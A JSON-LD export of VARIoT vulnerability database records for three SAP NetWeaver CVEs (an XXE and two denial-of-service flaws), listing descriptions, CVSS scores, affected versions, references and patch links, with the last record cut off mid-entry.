The Visual Composer VC70RUNTIME component in SAP NetWeaver AS JAVA 7.5 allows remote authenticated users to conduct XML External Entity (XXE) attacks via a crafted XML document in a request to irj/servlet/prt/portal/prtroot/com.sap.visualcomposer.BIKit.default, aka SAP Security Note 2386873. SAP Netweaver Visual Composer is prone to an information disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201705-4094",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.50"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "as java 7.5"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.5"
},
{
"model": "visual composer",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "96204"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-004275"
},
{
"db": "NVD",
"id": "CVE-2017-8913"
},
{
"db": "CNNVD",
"id": "CNNVD-201705-660"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:7.50:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-8913"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ERPScan",
"sources": [
{
"db": "BID",
"id": "96204"
}
],
"trust": 0.3
},
"cve": "CVE-2017-8913",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2017-8913",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-8913",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-8913",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201705-660",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-004275"
},
{
"db": "NVD",
"id": "CVE-2017-8913"
},
{
"db": "CNNVD",
"id": "CNNVD-201705-660"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Visual Composer VC70RUNTIME component in SAP NetWeaver AS JAVA 7.5 allows remote authenticated users to conduct XML External Entity (XXE) attacks via a crafted XML document in a request to irj/servlet/prt/portal/prtroot/com.sap.visualcomposer.BIKit.default, aka SAP Security Note 2386873. SAP Netweaver Visual Composer is prone to an information disclosure vulnerability. \nAttackers can exploit this issue to obtain sensitive information that may aid in launching further attacks",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-8913"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-004275"
},
{
"db": "BID",
"id": "96204"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-8913",
"trust": 2.7
},
{
"db": "JVNDB",
"id": "JVNDB-2017-004275",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201705-660",
"trust": 0.6
},
{
"db": "BID",
"id": "96204",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "96204"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-004275"
},
{
"db": "NVD",
"id": "CVE-2017-8913"
},
{
"db": "CNNVD",
"id": "CNNVD-201705-660"
}
]
},
"id": "VAR-201705-4094",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T14:01:35.907000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.sap.com/index.html"
},
{
"title": "SAP NetWeaver AS JAVA Visual Composer VC70RUNTIME Fixes for component security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=70291"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-004275"
},
{
"db": "CNNVD",
"id": "CNNVD-201705-660"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-611",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-004275"
},
{
"db": "NVD",
"id": "CVE-2017-8913"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "https://erpscan.io/advisories/erpscan-17-007-sap-netweaver-java-7-5-xxe-visual-composer-vc70runtime/"
},
{
"trust": 1.6,
"url": "https://erpscan.io/press-center/blog/sap-cyber-threat-intelligence-report-february-2017/"
},
{
"trust": 1.1,
"url": "https://erpscan.com/press-center/blog/sap-cyber-threat-intelligence-report-february-2017/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-8913"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-8913"
},
{
"trust": 0.8,
"url": "https://erpscan.com/advisories/erpscan-17-007-sap-netweaver-java-7-5-xxe-visual-composer-vc70runtime/"
},
{
"trust": 0.3,
"url": "http://www.sap.com/"
},
{
"trust": 0.3,
"url": "https://service.sap.com/sap/support/notes/2386873"
}
],
"sources": [
{
"db": "BID",
"id": "96204"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-004275"
},
{
"db": "NVD",
"id": "CVE-2017-8913"
},
{
"db": "CNNVD",
"id": "CNNVD-201705-660"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "96204"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-004275"
},
{
"db": "NVD",
"id": "CVE-2017-8913"
},
{
"db": "CNNVD",
"id": "CNNVD-201705-660"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-02-14T00:00:00",
"db": "BID",
"id": "96204"
},
{
"date": "2017-06-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-004275"
},
{
"date": "2017-05-23T04:29:02.243000",
"db": "NVD",
"id": "CVE-2017-8913"
},
{
"date": "2017-05-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201705-660"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-05-23T18:00:00",
"db": "BID",
"id": "96204"
},
{
"date": "2017-06-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-004275"
},
{
"date": "2021-04-20T19:37:03.733000",
"db": "NVD",
"id": "CVE-2017-8913"
},
{
"date": "2021-04-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201705-660"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201705-660"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver AS JAVA of Visual Composer VC70RUNTIME In the component XML External entity attack vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-004275"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "code problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201705-660"
}
],
"trust": 0.6
}
}
var-201411-0222
Vulnerability from variot
Unspecified vulnerability in SAP Internet Communication Manager (ICM), as used in SAP NetWeaver 7.02 and 7.3, allows remote attackers to cause a denial of service (process termination) via unknown vectors. SAP NetWeaver are prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash the affected application, denying service to legitimate users. SAP NetWeaver 7.02 and 7.30 are vulnerable; other versions may also be affected
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201411-0222",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 2.7,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.9,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.3"
}
],
"sources": [
{
"db": "BID",
"id": "71030"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005222"
},
{
"db": "NVD",
"id": "CVE-2014-8591"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-047"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.02:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.30:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2014-8591"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "71030"
}
],
"trust": 0.3
},
"cve": "CVE-2014-8591",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": true,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2014-8591",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2014-8591",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201411-047",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005222"
},
{
"db": "NVD",
"id": "CVE-2014-8591"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-047"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unspecified vulnerability in SAP Internet Communication Manager (ICM), as used in SAP NetWeaver 7.02 and 7.3, allows remote attackers to cause a denial of service (process termination) via unknown vectors. SAP NetWeaver are prone to a denial-of-service vulnerability. \nAn attacker can exploit this issue to crash the affected application, denying service to legitimate users. \nSAP NetWeaver 7.02 and 7.30 are vulnerable; other versions may also be affected",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-8591"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005222"
},
{
"db": "BID",
"id": "71030"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-8591",
"trust": 2.7
},
{
"db": "BID",
"id": "71030",
"trust": 1.3
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005222",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201411-047",
"trust": 0.6
}
],
"sources": [
{
"db": "BID",
"id": "71030"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005222"
},
{
"db": "NVD",
"id": "CVE-2014-8591"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-047"
}
]
},
"id": "VAR-201411-0222",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:53:20.843000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Note 1966655",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-55451"
},
{
"title": "Potential denial of service in #ICM #ABAP #Netweaver #SAP Note 1966655 http://ow.ly/CMsqQ",
"trust": 0.8,
"url": "https://twitter.com/sap_gsupport/status/524138333065449472"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005222"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2014-8591"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "http://blog.onapsis.com/analyzing-sap-security-notes-october-2014-edition/"
},
{
"trust": 1.6,
"url": "https://service.sap.com/sap/support/notes/1966655"
},
{
"trust": 1.6,
"url": "https://twitter.com/sap_gsupport/status/524138333065449472"
},
{
"trust": 1.4,
"url": "http://erpscan.com/advisories/erpscan-14-016-sap-netweaver-httpd-partial-http-post-requests-dos/"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/bid/71030"
},
{
"trust": 1.0,
"url": "https://erpscan.io/advisories/erpscan-14-016-sap-netweaver-httpd-partial-http-post-requests-dos/"
},
{
"trust": 1.0,
"url": "https://erpscan.io/press-center/blog/sap-critical-patch-update-october-2014/"
},
{
"trust": 1.0,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/98582"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-8591"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8591"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005222"
},
{
"db": "NVD",
"id": "CVE-2014-8591"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-047"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "71030"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005222"
},
{
"db": "NVD",
"id": "CVE-2014-8591"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-047"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-11-11T00:00:00",
"db": "BID",
"id": "71030"
},
{
"date": "2014-11-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-005222"
},
{
"date": "2014-11-04T15:55:07.777000",
"db": "NVD",
"id": "CVE-2014-8591"
},
{
"date": "2014-11-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201411-047"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-11-11T00:00:00",
"db": "BID",
"id": "71030"
},
{
"date": "2014-11-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-005222"
},
{
"date": "2018-12-10T19:29:05.280000",
"db": "NVD",
"id": "CVE-2014-8591"
},
{
"date": "2014-11-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201411-047"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201411-047"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Used in SAP Internet Communication Manager Service disruption in (DoS) Vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005222"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "71030"
}
],
"trust": 0.3
}
}
var-201704-1577
Vulnerability from variot
SAP AS JAVA SSO Authentication Library 2.0 through 3.0 allow remote attackers to cause a denial of service (memory consumption) via large values in the width and height parameters to otp_logon_ui_resources/qr, aka SAP Security Note 2389042. SAP Single Sign On is prone to a denial-of-service vulnerability. An attacker can exploit this issue to cause denial-of-service conditions
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201704-1577",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "sso authentication library",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "3.0"
},
{
"model": "sso authentication library",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "2.0"
},
{
"model": "as java sso authentication library",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "2.0 to 3.0"
},
{
"model": "single sign on",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
},
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "95363"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003212"
},
{
"db": "NVD",
"id": "CVE-2017-7696"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-559"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
